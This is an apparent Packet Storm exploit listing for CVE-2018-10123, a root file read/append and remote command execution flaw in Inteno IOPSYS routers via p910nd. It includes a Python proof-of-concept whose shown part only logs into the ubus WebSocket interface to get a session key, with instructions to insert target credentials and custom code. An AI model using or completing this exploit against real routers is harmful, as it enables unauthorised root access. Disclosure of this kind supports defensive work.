Source: Packet Storm, author: neonsea, ID: PACKETSTORM:147654
History: May 16, 2018 - 12:00 a.m.

Inteno IOPSYS 2.0 - 4.2.0 p910nd Remote Command Execution

EPSS: 0.014 (Low), percentile: 86.6%

```python
'''
Any authenticated user can modify the p910nd configuration in a way that allows them to read and append to any file as root. This leads to information disclosure and remote code execution. This vulnerability has been assigned the CVE ID: CVE-2018-10123.

This PoC requires Python 3.6 and a module called websocket-client, which you can install by invoking pip install websocket-client. Please note that if you wish to use this, you should edit lines 58-61 of the script to include the proper IP, username, password and SSH key. You may also edit line 63 to include your own code for execution.
'''

#!/usr/bin/python3

import json
import sys
import socket
import os
import time
from websocket import create_connection

def ubusAuth(host, username, password):
    ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])  # ubus JSON-RPC over WebSocket
    req = json.dumps({"jsonrpc":"2.0","method":"call",
        "params":["00000000000000000000000000000000","session","login",  # all-zero session ID: not yet logged in
        {"username": username,"password":password}],
        "id":666})
    ws.send(req)
    response = json.loads(ws.recv())
    ws.close()
    try:
        key = response.get('result')[1].get('ubus_rpc_session')  # session key returned on successful login
    except (IndexError, TypeError, AttributeError):  # failed login or error reply without a usable 'result'
        return None
    return key

```
